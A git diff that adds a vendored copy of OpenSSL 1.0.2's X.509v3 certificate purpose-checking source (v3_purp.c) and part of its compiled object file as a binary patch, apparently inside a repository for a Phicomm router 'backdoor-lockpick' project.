+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509v3.h>
+#include <openssl/x509_vfy.h>
+
+static void x509v3_cache_extensions(X509 *x);
+
+static int check_ssl_ca(const X509 *x);
+static int check_purpose_ssl_client(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca);
+static int check_purpose_ssl_server(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca);
+static int check_purpose_ns_ssl_server(const X509_PURPOSE *xp, const X509 *x,
+                                       int ca);
+static int purpose_smime(const X509 *x, int ca);
+static int check_purpose_smime_sign(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca);
+static int check_purpose_smime_encrypt(const X509_PURPOSE *xp, const X509 *x,
+                                       int ca);
+static int check_purpose_crl_sign(const X509_PURPOSE *xp, const X509 *x,
+                                  int ca);
+static int check_purpose_timestamp_sign(const X509_PURPOSE *xp, const X509 *x,
+                                        int ca);
+static int no_check(const X509_PURPOSE *xp, const X509 *x, int ca);
+static int ocsp_helper(const X509_PURPOSE *xp, const X509 *x, int ca);
+
+static int xp_cmp(const X509_PURPOSE *const *a, const X509_PURPOSE *const *b);
+static void xptable_free(X509_PURPOSE *p);
+
+static X509_PURPOSE xstandard[] = {
+    {X509_PURPOSE_SSL_CLIENT, X509_TRUST_SSL_CLIENT, 0,
+     check_purpose_ssl_client, "SSL client", "sslclient", NULL},
+    {X509_PURPOSE_SSL_SERVER, X509_TRUST_SSL_SERVER, 0,
+     check_purpose_ssl_server, "SSL server", "sslserver", NULL},
+    {X509_PURPOSE_NS_SSL_SERVER, X509_TRUST_SSL_SERVER, 0,
+     check_purpose_ns_ssl_server, "Netscape SSL server", "nssslserver", NULL},
+    {X509_PURPOSE_SMIME_SIGN, X509_TRUST_EMAIL, 0, check_purpose_smime_sign,
+     "S/MIME signing", "smimesign", NULL},
+    {X509_PURPOSE_SMIME_ENCRYPT, X509_TRUST_EMAIL, 0,
+     check_purpose_smime_encrypt, "S/MIME encryption", "smimeencrypt", NULL},
+    {X509_PURPOSE_CRL_SIGN, X509_TRUST_COMPAT, 0, check_purpose_crl_sign,
+     "CRL signing", "crlsign", NULL},
+    {X509_PURPOSE_ANY, X509_TRUST_DEFAULT, 0, no_check, "Any Purpose", "any",
+     NULL},
+    {X509_PURPOSE_OCSP_HELPER, X509_TRUST_COMPAT, 0, ocsp_helper,
+     "OCSP helper", "ocsphelper", NULL},
+    {X509_PURPOSE_TIMESTAMP_SIGN, X509_TRUST_TSA, 0,
+     check_purpose_timestamp_sign, "Time Stamp signing", "timestampsign",
+     NULL},
+};
+
+#define X509_PURPOSE_COUNT (sizeof(xstandard)/sizeof(X509_PURPOSE))
+
+IMPLEMENT_STACK_OF(X509_PURPOSE)
+
+static STACK_OF(X509_PURPOSE) *xptable = NULL;
+
+static int xp_cmp(const X509_PURPOSE *const *a, const X509_PURPOSE *const *b)
+{
+    return (*a)->purpose - (*b)->purpose;
+}
+
+/*
+ * As much as I'd like to make X509_check_purpose use a "const" X509* I
+ * really can't because it does recalculate hashes and do other non-const
+ * things.
+ */
+int X509_check_purpose(X509 *x, int id, int ca)
+{
+    int idx;
+    const X509_PURPOSE *pt;
+    if (!(x->ex_flags & EXFLAG_SET)) {
+        CRYPTO_w_lock(CRYPTO_LOCK_X509);
+        x509v3_cache_extensions(x);
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509);
+    }
+    if (id == -1)
+        return 1;
+    idx = X509_PURPOSE_get_by_id(id);
+    if (idx == -1)
+        return -1;
+    pt = X509_PURPOSE_get0(idx);
+    return pt->check_purpose(pt, x, ca);
+}
+
+int X509_PURPOSE_set(int *p, int purpose)
+{
+    if (X509_PURPOSE_get_by_id(purpose) == -1) {
+        X509V3err(X509V3_F_X509_PURPOSE_SET, X509V3_R_INVALID_PURPOSE);
+        return 0;
+    }
+    *p = purpose;
+    return 1;
+}
+
+int X509_PURPOSE_get_count(void)
+{
+    if (!xptable)
+        return X509_PURPOSE_COUNT;
+    return sk_X509_PURPOSE_num(xptable) + X509_PURPOSE_COUNT;
+}
+
+X509_PURPOSE *X509_PURPOSE_get0(int idx)
+{
+    if (idx < 0)
+        return NULL;
+    if (idx < (int)X509_PURPOSE_COUNT)
+        return xstandard + idx;
+    return sk_X509_PURPOSE_value(xptable, idx - X509_PURPOSE_COUNT);
+}
+
+int X509_PURPOSE_get_by_sname(char *sname)
+{
+    int i;
+    X509_PURPOSE *xptmp;
+    for (i = 0; i < X509_PURPOSE_get_count(); i++) {
+        xptmp = X509_PURPOSE_get0(i);
+        if (!strcmp(xptmp->sname, sname))
+            return i;
+    }
+    return -1;
+}
+
+int X509_PURPOSE_get_by_id(int purpose)
+{
+    X509_PURPOSE tmp;
+    int idx;
+    if ((purpose >= X509_PURPOSE_MIN) && (purpose <= X509_PURPOSE_MAX))
+        return purpose - X509_PURPOSE_MIN;
+    tmp.purpose = purpose;
+    if (!xptable)
+        return -1;
+    idx = sk_X509_PURPOSE_find(xptable, &tmp);
+    if (idx == -1)
+        return -1;
+    return idx + X509_PURPOSE_COUNT;
+}
+
+int X509_PURPOSE_add(int id, int trust, int flags,
+                     int (*ck) (const X509_PURPOSE *, const X509 *, int),
+                     char *name, char *sname, void *arg)
+{
+    int idx;
+    X509_PURPOSE *ptmp;
+    /*
+     * This is set according to what we change: application can't set it
+     */
+    flags &= ~X509_PURPOSE_DYNAMIC;
+    /* This will always be set for application modified trust entries */
+    flags |= X509_PURPOSE_DYNAMIC_NAME;
+    /* Get existing entry if any */
+    idx = X509_PURPOSE_get_by_id(id);
+    /* Need a new entry */
+    if (idx == -1) {
+        if (!(ptmp = OPENSSL_malloc(sizeof(X509_PURPOSE)))) {
+            X509V3err(X509V3_F_X509_PURPOSE_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        ptmp->flags = X509_PURPOSE_DYNAMIC;
+    } else
+        ptmp = X509_PURPOSE_get0(idx);
+
+    /* OPENSSL_free existing name if dynamic */
+    if (ptmp->flags & X509_PURPOSE_DYNAMIC_NAME) {
+        OPENSSL_free(ptmp->name);
+        OPENSSL_free(ptmp->sname);
+    }
+    /* dup supplied name */
+    ptmp->name = BUF_strdup(name);
+    ptmp->sname = BUF_strdup(sname);
+    if (!ptmp->name || !ptmp->sname) {
+        X509V3err(X509V3_F_X509_PURPOSE_ADD, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    /* Keep the dynamic flag of existing entry */
+    ptmp->flags &= X509_PURPOSE_DYNAMIC;
+    /* Set all other flags */
+    ptmp->flags |= flags;
+
+    ptmp->purpose = id;
+    ptmp->trust = trust;
+    ptmp->check_purpose = ck;
+    ptmp->usr_data = arg;
+
+    /* If its a new entry manage the dynamic table */
+    if (idx == -1) {
+        if (!xptable && !(xptable = sk_X509_PURPOSE_new(xp_cmp))) {
+            X509V3err(X509V3_F_X509_PURPOSE_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (!sk_X509_PURPOSE_push(xptable, ptmp)) {
+            X509V3err(X509V3_F_X509_PURPOSE_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static void xptable_free(X509_PURPOSE *p)
+{
+    if (!p)
+        return;
+    if (p->flags & X509_PURPOSE_DYNAMIC) {
+        if (p->flags & X509_PURPOSE_DYNAMIC_NAME) {
+            OPENSSL_free(p->name);
+            OPENSSL_free(p->sname);
+        }
+        OPENSSL_free(p);
+    }
+}
+
+void X509_PURPOSE_cleanup(void)
+{
+    unsigned int i;
+    sk_X509_PURPOSE_pop_free(xptable, xptable_free);
+    for (i = 0; i < X509_PURPOSE_COUNT; i++)
+        xptable_free(xstandard + i);
+    xptable = NULL;
+}
+
+int X509_PURPOSE_get_id(X509_PURPOSE *xp)
+{
+    return xp->purpose;
+}
+
+char *X509_PURPOSE_get0_name(X509_PURPOSE *xp)
+{
+    return xp->name;
+}
+
+char *X509_PURPOSE_get0_sname(X509_PURPOSE *xp)
+{
+    return xp->sname;
+}
+
+int X509_PURPOSE_get_trust(X509_PURPOSE *xp)
+{
+    return xp->trust;
+}
+
+static int nid_cmp(const int *a, const int *b)
+{
+    return *a - *b;
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(int, int, nid);
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(int, int, nid);
+
+int X509_supported_extension(X509_EXTENSION *ex)
+{
+    /*
+     * This table is a list of the NIDs of supported extensions: that is
+     * those which are used by the verify process. If an extension is
+     * critical and doesn't appear in this list then the verify process will
+     * normally reject the certificate. The list must be kept in numerical
+     * order because it will be searched using bsearch.
+     */
+
+    static const int supported_nids[] = {
+        NID_netscape_cert_type, /* 71 */
+        NID_key_usage,          /* 83 */
+        NID_subject_alt_name,   /* 85 */
+        NID_basic_constraints,  /* 87 */
+        NID_certificate_policies, /* 89 */
+        NID_ext_key_usage,      /* 126 */
+#ifndef OPENSSL_NO_RFC3779
+        NID_sbgp_ipAddrBlock,   /* 290 */
+        NID_sbgp_autonomousSysNum, /* 291 */
+#endif
+        NID_policy_constraints, /* 401 */
+        NID_proxyCertInfo,      /* 663 */
+        NID_name_constraints,   /* 666 */
+        NID_policy_mappings,    /* 747 */
+        NID_inhibit_any_policy  /* 748 */
+    };
+
+    int ex_nid = OBJ_obj2nid(X509_EXTENSION_get_object(ex));
+
+    if (ex_nid == NID_undef)
+        return 0;
+
+    if (OBJ_bsearch_nid(&ex_nid, supported_nids,
+                        sizeof(supported_nids) / sizeof(int)))
+        return 1;
+    return 0;
+}
+
+static void setup_dp(X509 *x, DIST_POINT *dp)
+{
+    X509_NAME *iname = NULL;
+    int i;
+    if (dp->reasons) {
+        if (dp->reasons->length > 0)
+            dp->dp_reasons = dp->reasons->data[0];
+        if (dp->reasons->length > 1)
+            dp->dp_reasons |= (dp->reasons->data[1] << 8);
+        dp->dp_reasons &= CRLDP_ALL_REASONS;
+    } else
+        dp->dp_reasons = CRLDP_ALL_REASONS;
+    if (!dp->distpoint || (dp->distpoint->type != 1))
+        return;
+    for (i = 0; i < sk_GENERAL_NAME_num(dp->CRLissuer); i++) {
+        GENERAL_NAME *gen = sk_GENERAL_NAME_value(dp->CRLissuer, i);
+        if (gen->type == GEN_DIRNAME) {
+            iname = gen->d.directoryName;
+            break;
+        }
+    }
+    if (!iname)
+        iname = X509_get_issuer_name(x);
+
+    DIST_POINT_set_dpname(dp->distpoint, iname);
+
+}
+
+static void setup_crldp(X509 *x)
+{
+    int i;
+    x->crldp = X509_get_ext_d2i(x, NID_crl_distribution_points, NULL, NULL);
+    for (i = 0; i < sk_DIST_POINT_num(x->crldp); i++)
+        setup_dp(x, sk_DIST_POINT_value(x->crldp, i));
+}
+
+static void x509v3_cache_extensions(X509 *x)
+{
+    BASIC_CONSTRAINTS *bs;
+    PROXY_CERT_INFO_EXTENSION *pci;
+    ASN1_BIT_STRING *usage;
+    ASN1_BIT_STRING *ns;
+    EXTENDED_KEY_USAGE *extusage;
+    X509_EXTENSION *ex;
+
+    int i;
+    if (x->ex_flags & EXFLAG_SET)
+        return;
+#ifndef OPENSSL_NO_SHA
+    X509_digest(x, EVP_sha1(), x->sha1_hash, NULL);
+#endif
+    /* V1 should mean no extensions ... */
+    if (!X509_get_version(x))
+        x->ex_flags |= EXFLAG_V1;
+    /* Handle basic constraints */
+    if ((bs = X509_get_ext_d2i(x, NID_basic_constraints, NULL, NULL))) {
+        if (bs->ca)
+            x->ex_flags |= EXFLAG_CA;
+        if (bs->pathlen) {
+            if ((bs->pathlen->type == V_ASN1_NEG_INTEGER)
+                || !bs->ca) {
+                x->ex_flags |= EXFLAG_INVALID;
+                x->ex_pathlen = 0;
+            } else
+                x->ex_pathlen = ASN1_INTEGER_get(bs->pathlen);
+        } else
+            x->ex_pathlen = -1;
+        BASIC_CONSTRAINTS_free(bs);
+        x->ex_flags |= EXFLAG_BCONS;
+    }
+    /* Handle proxy certificates */
+    if ((pci = X509_get_ext_d2i(x, NID_proxyCertInfo, NULL, NULL))) {
+        if (x->ex_flags & EXFLAG_CA
+            || X509_get_ext_by_NID(x, NID_subject_alt_name, -1) >= 0
+            || X509_get_ext_by_NID(x, NID_issuer_alt_name, -1) >= 0) {
+            x->ex_flags |= EXFLAG_INVALID;
+        }
+        if (pci->pcPathLengthConstraint) {
+            x->ex_pcpathlen = ASN1_INTEGER_get(pci->pcPathLengthConstraint);
+        } else
+            x->ex_pcpathlen = -1;
+        PROXY_CERT_INFO_EXTENSION_free(pci);
+        x->ex_flags |= EXFLAG_PROXY;
+    }
+    /* Handle key usage */
+    if ((usage = X509_get_ext_d2i(x, NID_key_usage, NULL, NULL))) {
+        if (usage->length > 0) {
+            x->ex_kusage = usage->data[0];
+            if (usage->length > 1)
+                x->ex_kusage |= usage->data[1] << 8;
+        } else
+            x->ex_kusage = 0;
+        x->ex_flags |= EXFLAG_KUSAGE;
+        ASN1_BIT_STRING_free(usage);
+    }
+    x->ex_xkusage = 0;
+    if ((extusage = X509_get_ext_d2i(x, NID_ext_key_usage, NULL, NULL))) {
+        x->ex_flags |= EXFLAG_XKUSAGE;
+        for (i = 0; i < sk_ASN1_OBJECT_num(extusage); i++) {
+            switch (OBJ_obj2nid(sk_ASN1_OBJECT_value(extusage, i))) {
+            case NID_server_auth:
+                x->ex_xkusage |= XKU_SSL_SERVER;
+                break;
+
+            case NID_client_auth:
+                x->ex_xkusage |= XKU_SSL_CLIENT;
+                break;
+
+            case NID_email_protect:
+                x->ex_xkusage |= XKU_SMIME;
+                break;
+
+            case NID_code_sign:
+                x->ex_xkusage |= XKU_CODE_SIGN;
+                break;
+
+            case NID_ms_sgc:
+            case NID_ns_sgc:
+                x->ex_xkusage |= XKU_SGC;
+                break;
+
+            case NID_OCSP_sign:
+                x->ex_xkusage |= XKU_OCSP_SIGN;
+                break;
+
+            case NID_time_stamp:
+                x->ex_xkusage |= XKU_TIMESTAMP;
+                break;
+
+            case NID_dvcs:
+                x->ex_xkusage |= XKU_DVCS;
+                break;
+
+            case NID_anyExtendedKeyUsage:
+                x->ex_xkusage |= XKU_ANYEKU;
+                break;
+            }
+        }
+        sk_ASN1_OBJECT_pop_free(extusage, ASN1_OBJECT_free);
+    }
+
+    if ((ns = X509_get_ext_d2i(x, NID_netscape_cert_type, NULL, NULL))) {
+        if (ns->length > 0)
+            x->ex_nscert = ns->data[0];
+        else
+            x->ex_nscert = 0;
+        x->ex_flags |= EXFLAG_NSCERT;
+        ASN1_BIT_STRING_free(ns);
+    }
+    x->skid = X509_get_ext_d2i(x, NID_subject_key_identifier, NULL, NULL);
+    x->akid = X509_get_ext_d2i(x, NID_authority_key_identifier, NULL, NULL);
+    /* Does subject name match issuer ? */
+    if (!X509_NAME_cmp(X509_get_subject_name(x), X509_get_issuer_name(x))) {
+        x->ex_flags |= EXFLAG_SI;
+        /* If SKID matches AKID also indicate self signed */
+        if (X509_check_akid(x, x->akid) == X509_V_OK)
+            x->ex_flags |= EXFLAG_SS;
+    }
+    x->altname = X509_get_ext_d2i(x, NID_subject_alt_name, NULL, NULL);
+    x->nc = X509_get_ext_d2i(x, NID_name_constraints, &i, NULL);
+    if (!x->nc && (i != -1))
+        x->ex_flags |= EXFLAG_INVALID;
+    setup_crldp(x);
+
+#ifndef OPENSSL_NO_RFC3779
+    x->rfc3779_addr = X509_get_ext_d2i(x, NID_sbgp_ipAddrBlock, NULL, NULL);
+    x->rfc3779_asid = X509_get_ext_d2i(x, NID_sbgp_autonomousSysNum,
+                                       NULL, NULL);
+#endif
+    for (i = 0; i < X509_get_ext_count(x); i++) {
+        ex = X509_get_ext(x, i);
+        if (OBJ_obj2nid(X509_EXTENSION_get_object(ex))
+            == NID_freshest_crl)
+            x->ex_flags |= EXFLAG_FRESHEST;
+        if (!X509_EXTENSION_get_critical(ex))
+            continue;
+        if (!X509_supported_extension(ex)) {
+            x->ex_flags |= EXFLAG_CRITICAL;
+            break;
+        }
+    }
+    x->ex_flags |= EXFLAG_SET;
+}
+
+/*-
+ * CA checks common to all purposes
+ * return codes:
+ * 0 not a CA
+ * 1 is a CA
+ * 2 basicConstraints absent so "maybe" a CA
+ * 3 basicConstraints absent but self signed V1.
+ * 4 basicConstraints absent but keyUsage present and keyCertSign asserted.
+ */
+
+#define V1_ROOT (EXFLAG_V1|EXFLAG_SS)
+#define ku_reject(x, usage) \
+        (((x)->ex_flags & EXFLAG_KUSAGE) && !((x)->ex_kusage & (usage)))
+#define xku_reject(x, usage) \
+        (((x)->ex_flags & EXFLAG_XKUSAGE) && !((x)->ex_xkusage & (usage)))
+#define ns_reject(x, usage) \
+        (((x)->ex_flags & EXFLAG_NSCERT) && !((x)->ex_nscert & (usage)))
+
+static int check_ca(const X509 *x)
+{
+    /* keyUsage if present should allow cert signing */
+    if (ku_reject(x, KU_KEY_CERT_SIGN))
+        return 0;
+    if (x->ex_flags & EXFLAG_BCONS) {
+        if (x->ex_flags & EXFLAG_CA)
+            return 1;
+        /* If basicConstraints says not a CA then say so */
+        else
+            return 0;
+    } else {
+        /* we support V1 roots for...  uh, I don't really know why. */
+        if ((x->ex_flags & V1_ROOT) == V1_ROOT)
+            return 3;
+        /*
+         * If key usage present it must have certSign so tolerate it
+         */
+        else if (x->ex_flags & EXFLAG_KUSAGE)
+            return 4;
+        /* Older certificates could have Netscape-specific CA types */
+        else if (x->ex_flags & EXFLAG_NSCERT && x->ex_nscert & NS_ANY_CA)
+            return 5;
+        /* can this still be regarded a CA certificate?  I doubt it */
+        return 0;
+    }
+}
+
+int X509_check_ca(X509 *x)
+{
+    if (!(x->ex_flags & EXFLAG_SET)) {
+        CRYPTO_w_lock(CRYPTO_LOCK_X509);
+        x509v3_cache_extensions(x);
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509);
+    }
+
+    return check_ca(x);
+}
+
+/* Check SSL CA: common checks for SSL client and server */
+static int check_ssl_ca(const X509 *x)
+{
+    int ca_ret;
+    ca_ret = check_ca(x);
+    if (!ca_ret)
+        return 0;
+    /* check nsCertType if present */
+    if (ca_ret != 5 || x->ex_nscert & NS_SSL_CA)
+        return ca_ret;
+    else
+        return 0;
+}
+
+static int check_purpose_ssl_client(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca)
+{
+    if (xku_reject(x, XKU_SSL_CLIENT))
+        return 0;
+    if (ca)
+        return check_ssl_ca(x);
+    /* We need to do digital signatures or key agreement */
+    if (ku_reject(x, KU_DIGITAL_SIGNATURE | KU_KEY_AGREEMENT))
+        return 0;
+    /* nsCertType if present should allow SSL client use */
+    if (ns_reject(x, NS_SSL_CLIENT))
+        return 0;
+    return 1;
+}
+
+/*
+ * Key usage needed for TLS/SSL server: digital signature, encipherment or
+ * key agreement. The ssl code can check this more thoroughly for individual
+ * key types.
+ */
+#define KU_TLS \
+        KU_DIGITAL_SIGNATURE|KU_KEY_ENCIPHERMENT|KU_KEY_AGREEMENT
+
+static int check_purpose_ssl_server(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca)
+{
+    if (xku_reject(x, XKU_SSL_SERVER | XKU_SGC))
+        return 0;
+    if (ca)
+        return check_ssl_ca(x);
+
+    if (ns_reject(x, NS_SSL_SERVER))
+        return 0;
+    if (ku_reject(x, KU_TLS))
+        return 0;
+
+    return 1;
+
+}
+
+static int check_purpose_ns_ssl_server(const X509_PURPOSE *xp, const X509 *x,
+                                       int ca)
+{
+    int ret;
+    ret = check_purpose_ssl_server(xp, x, ca);
+    if (!ret || ca)
+        return ret;
+    /* We need to encipher or Netscape complains */
+    if (ku_reject(x, KU_KEY_ENCIPHERMENT))
+        return 0;
+    return ret;
+}
+
+/* common S/MIME checks */
+static int purpose_smime(const X509 *x, int ca)
+{
+    if (xku_reject(x, XKU_SMIME))
+        return 0;
+    if (ca) {
+        int ca_ret;
+        ca_ret = check_ca(x);
+        if (!ca_ret)
+            return 0;
+        /* check nsCertType if present */
+        if (ca_ret != 5 || x->ex_nscert & NS_SMIME_CA)
+            return ca_ret;
+        else
+            return 0;
+    }
+    if (x->ex_flags & EXFLAG_NSCERT) {
+        if (x->ex_nscert & NS_SMIME)
+            return 1;
+        /* Workaround for some buggy certificates */
+        if (x->ex_nscert & NS_SSL_CLIENT)
+            return 2;
+        return 0;
+    }
+    return 1;
+}
+
+static int check_purpose_smime_sign(const X509_PURPOSE *xp, const X509 *x,
+                                    int ca)
+{
+    int ret;
+    ret = purpose_smime(x, ca);
+    if (!ret || ca)
+        return ret;
+    if (ku_reject(x, KU_DIGITAL_SIGNATURE | KU_NON_REPUDIATION))
+        return 0;
+    return ret;
+}
+
+static int check_purpose_smime_encrypt(const X509_PURPOSE *xp, const X509 *x,
+                                       int ca)
+{
+    int ret;
+    ret = purpose_smime(x, ca);
+    if (!ret || ca)
+        return ret;
+    if (ku_reject(x, KU_KEY_ENCIPHERMENT))
+        return 0;
+    return ret;
+}
+
+static int check_purpose_crl_sign(const X509_PURPOSE *xp, const X509 *x,
+                                  int ca)
+{
+    if (ca) {
+        int ca_ret;
+        if ((ca_ret = check_ca(x)) != 2)
+            return ca_ret;
+        else
+            return 0;
+    }
+    if (ku_reject(x, KU_CRL_SIGN))
+        return 0;
+    return 1;
+}
+
+/*
+ * OCSP helper: this is *not* a full OCSP check. It just checks that each CA
+ * is valid. Additional checks must be made on the chain.
+ */
+
+static int ocsp_helper(const X509_PURPOSE *xp, const X509 *x, int ca)
+{
+    /*
+     * Must be a valid CA.  Should we really support the "I don't know" value
+     * (2)?
+     */
+    if (ca)
+        return check_ca(x);
+    /* leaf certificate is checked in OCSP_verify() */
+    return 1;
+}
+
+static int check_purpose_timestamp_sign(const X509_PURPOSE *xp, const X509 *x,
+                                        int ca)
+{
+    int i_ext;
+
+    /* If ca is true we must return if this is a valid CA certificate. */
+    if (ca)
+        return check_ca(x);
+
+    /*
+     * Check the optional key usage field:
+     * if Key Usage is present, it must be one of digitalSignature
+     * and/or nonRepudiation (other values are not consistent and shall
+     * be rejected).
+     */
+    if ((x->ex_flags & EXFLAG_KUSAGE)
+        && ((x->ex_kusage & ~(KU_NON_REPUDIATION | KU_DIGITAL_SIGNATURE)) ||
+            !(x->ex_kusage & (KU_NON_REPUDIATION | KU_DIGITAL_SIGNATURE))))
+        return 0;
+
+    /* Only time stamp key usage is permitted and it's required. */
+    if (!(x->ex_flags & EXFLAG_XKUSAGE) || x->ex_xkusage != XKU_TIMESTAMP)
+        return 0;
+
+    /* Extended Key Usage MUST be critical */
+    i_ext = X509_get_ext_by_NID((X509 *)x, NID_ext_key_usage, -1);
+    if (i_ext >= 0) {
+        X509_EXTENSION *ext = X509_get_ext((X509 *)x, i_ext);
+        if (!X509_EXTENSION_get_critical(ext))
+            return 0;
+    }
+
+    return 1;
+}
+
+static int no_check(const X509_PURPOSE *xp, const X509 *x, int ca)
+{
+    return 1;
+}
+
+/*-
+ * Various checks to see if one certificate issued the second.
+ * This can be used to prune a set of possible issuer certificates
+ * which have been looked up using some simple method such as by
+ * subject name.
+ * These are:
+ * 1. Check issuer_name(subject) == subject_name(issuer)
+ * 2. If akid(subject) exists check it matches issuer
+ * 3. If key_usage(issuer) exists check it supports certificate signing
+ * returns 0 for OK, positive for reason for mismatch, reasons match
+ * codes for X509_verify_cert()
+ */
+
+int X509_check_issued(X509 *issuer, X509 *subject)
+{
+    if (X509_NAME_cmp(X509_get_subject_name(issuer),
+                      X509_get_issuer_name(subject)))
+        return X509_V_ERR_SUBJECT_ISSUER_MISMATCH;
+    x509v3_cache_extensions(issuer);
+    x509v3_cache_extensions(subject);
+
+    if (subject->akid) {
+        int ret = X509_check_akid(issuer, subject->akid);
+        if (ret != X509_V_OK)
+            return ret;
+    }
+
+    if (subject->ex_flags & EXFLAG_PROXY) {
+        if (ku_reject(issuer, KU_DIGITAL_SIGNATURE))
+            return X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE;
+    } else if (ku_reject(issuer, KU_KEY_CERT_SIGN))
+        return X509_V_ERR_KEYUSAGE_NO_CERTSIGN;
+    return X509_V_OK;
+}
+
+int X509_check_akid(X509 *issuer, AUTHORITY_KEYID *akid)
+{
+
+    if (!akid)
+        return X509_V_OK;
+
+    /* Check key ids (if present) */
+    if (akid->keyid && issuer->skid &&
+        ASN1_OCTET_STRING_cmp(akid->keyid, issuer->skid))
+        return X509_V_ERR_AKID_SKID_MISMATCH;
+    /* Check serial number */
+    if (akid->serial &&
+        ASN1_INTEGER_cmp(X509_get_serialNumber(issuer), akid->serial))
+        return X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH;
+    /* Check issuer name */
+    if (akid->issuer) {
+        /*
+         * Ugh, for some peculiar reason AKID includes SEQUENCE OF
+         * GeneralName. So look for a DirName. There may be more than one but
+         * we only take any notice of the first.
+         */
+        GENERAL_NAMES *gens;
+        GENERAL_NAME *gen;
+        X509_NAME *nm = NULL;
+        int i;
+        gens = akid->issuer;
+        for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+            gen = sk_GENERAL_NAME_value(gens, i);
+            if (gen->type == GEN_DIRNAME) {
+                nm = gen->d.dirn;
+                break;
+            }
+        }
+        if (nm && X509_NAME_cmp(nm, X509_get_issuer_name(issuer)))
+            return X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH;
+    }
+    return X509_V_OK;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_purp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_purp.o
new file mode 100644
index 0000000000000000000000000000000000000000..eaedaec42903d60c04dbfdf392bd923d260f790f
GIT binary patch
literal 14176
zcmcJW4RBl4m4KgRITlHfO`usrND<&91`@{(&~+#QJxj8miDL`@5EGIrimb+N{G*kg
zf<sB-tZ;@`MG#;+FdbmBJKb$|+u3C(lNz=SBF<04vJjvHv^x-!rPQfdV4*mnlxokp
z?_Bx##cw9ebnlFG@B8k#=bn4+x%a(yW$z3$H#mxl6q$;YTa>9QNfl*$#Z=iVie6=&
za*^_B+1LN5rAxK+{IqhNV+=3TrPs|G)6#1-&3HBSu0wa#W+xkiPW`sYLq+-=%{ZaG
zFyTy%7maDg8>7XbYuEc;kD_S1{*0M^^{5k=HgY_9X>E4+luMtdr5iV<#!I!-*`iCc
zXHKNXOU5Q1&*$?aS^c8a*^=bk$;OS&=b({N=07A%(2O%9ujwVHw}R9t4oA?bk~Wgp
zmv*KbU7GRb{v!Q~{SNG9XT=06(bC&JX2JMq!)YWN#zcFtJbed@>dfRJr#@@4q06CP
z3pSLT9)NBp4>^D}2JhD^z-ZBx?ncXDw52%O+U(3qF4C)nl52z#7b@B4)#neNa+pfy
z3is_V`+iocXfi%ljaMiB)pWt70dUnN>ZDh5=odm3^b}lylVE&oTHDy=)K@}B3ns#U
z7OuMiUAG)Ma}?y!+ZE7g<K!VvvTXR&@N*6reOcfT_RPFzoH5=|jT3Sb{wgq%P0pKa
z1Os3yg4u#T5gbx@&@|T~JY_5i!@ONMaq!E0K6TcStdRXqHh}WkTDl>qy*h#3oRTg%
zy%(g-xxq<*iEIgKXI{7!`b*wE{BBln9zNyN8@1HVE^pGSr9P-QxC4fjdNHpV_g1>Z
zR2xUd@J1$wF4NKyYQ`~9Ig$nEmmSDzslyd!BxvbX7#A2ubAm!<T`GIQ*ysfSg=r)C
zp~b1ZYv(*Ia!kvZ!dtR6TG83D%-v_Gxri+a3$-Iq`(C?dd~v%_=U+L#W1-*pow(49
zceM178Iv%B7pVEexnHZPm-2pNeBE8@dea%H543JA?Oarah8h0Ky4q}}5xnTyx&((g
zWpc74^~-#2o|e&R@Ts$T{R6OHOLtV(b!*pOB6R2_X6LEHn&_Yt){1ea-T2hBFrQ5>
z4Af?8k3aV?ba*fWU(a6!U!qZMHs>-nD8i@f?%E*Qt83R7$J9I47%!`xs_~iH(P@0y
zj<aEOR5~@IS<b{5Xl{J&4ID-0M)+2quaRn-jKdm)n#b%{1$@vz0oL#7*8m*zx^U6w
zt~O2zbD-U%*X7VJ1~-~(ya^`RbZE1Y7c$MpnI`ZWRj2N)tWfaUqdyE?>KPS$<4XH0
zovN|4GGO#o!VdQ5)TyEi4rxGLsTUpjF_bUI%b*Hla^Yo_UMifByG2WhC{U7@Lp&V)
